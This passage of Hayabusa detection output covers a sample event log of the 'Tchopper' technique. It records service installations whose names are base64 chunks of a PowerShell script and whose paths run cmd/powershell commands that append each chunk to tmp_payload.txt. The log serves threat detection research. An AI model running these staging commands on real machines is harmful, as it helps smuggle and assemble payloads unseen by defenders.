ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:23.533 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWQgLWVxICJ0cnVlIn0gLVByb3BlcnRpZXMgT3BlcmF0aW5nU3lzdGVtIHwgU2VsZWN0IEROU0hvc3RuYW1lLCBPcGVyYXRpbmdTeXN0ZW0NCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg213"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:24.976 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAkQ29tcHV0ZXJMaXN0ID0gJEdldEFEQ29tcHV0ZXJMaXN0LkROU0hvc3ROYW1lDQoNCiAgICAgICAgICAgICAgICBicmVhaw0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgfSANCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg214"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:26.423 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgIA0KICAgICAgICAgICAgJEZJTEVfT1BUIHsNCiAgICAgICAgICAgICAgICANCiAgICAgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUZpbGVOYW1lICJEZXNrdG9wIiANCiAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg215"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:27.868 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAkQ29tcHV0ZXJMaXN0ID0gR2V0LUNvbnRlbnQgJENvbXB1dGVyTGlzdA0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgICAgIH0NCg0KICAgICAgICAgICAgJExP | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg216"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:29.321 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Q0FMSE9TVF9PUFQgew0KICAgICAgICAgICAgICAgIA0KICAgICAgICAgICAgICAgICRDb21wdXRlckxpc3QgPSAibG9jYWxob3N0Ig0KDQogICAgICAgICAgICAgICAgYnJlYWsNCiAgICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg217"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:30.774 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgIH0gDQogICAgICAgIH0NCg0KICAgICAgICBSZXR1cm4gJENvbXB1dGVyTGlzdA0KDQogICAgfQ0KDQogICAgY2F0Y2ggew0KICAgIA0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiVW5h | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg218"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:32.230 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: YmxlIHRvIGRldGVybWluZSBjb21wdXRlciBsaXN0Ig0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICRFcnJvclswXQ0KDQogICAgICAgICRFcnJvckxpbmVOdW1iZXIgPSAkRXJyb3JbMF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg219"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:33.674 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 0uSW52b2NhdGlvbkluZm8uc2NyaXB0bGluZW51bWJlcg0KDQogICAgICAgIFdyaXRlLUxvZyAkRVJST1JfTE9HICJDYXVnaHQgb24gbGluZSBudW1iZXI6ICRFcnJvckxpbmVOdW1iZXIiDQoNCiAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg220"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:35.128 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgZXhpdA0KDQogICAgfQ0KfQ0KDQoNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg221"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:36.582 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMNCiNGdW5jdGlvbiB3aWxsIGxvZyBtZXNzYWdlcyB0aHJvdWdob3V0IHRoZSBzY3JpcHQgZXhlY3V0aW9uIA0KDQojQHBhcmFtICRzZXZlcml0eSAgIC0+IEhvdyBzZXZlcmUgb2YgdGhl | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg222"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:38.020 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IGlucHV0IG1lc3NhZ2UgdG8gbG9nICAgDQojQHBhcmFtICRsb2dNZXNzYWdlIC0+IFRoZSBtZXNzYWdlIHRoYXQgd2lsbCBiZSBsb2dnZWQgY2FzdCB0byBhIHN0cmluZw0KDQojIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg223"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:39.470 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQpmdW5jdGlvbiBXcml0ZS1Mb2cgeyBwYXJhbSgkc2V2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg224"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZXJpdHksIFtzdHJpbmddJGxvZ01lc3NhZ2UpDQogICAgDQogICAgdHJ5IHsNCiAgICAgICAgDQogICAgICAgIGlmICgkbG9nTWVzc2FnZS5sZW5ndGggLUdUIDIwMCkgew0KICAgICAgICAgICAgJG | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg225"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",../hayabusa-rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" 2021-11-03 17:20:40.933 +09:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: 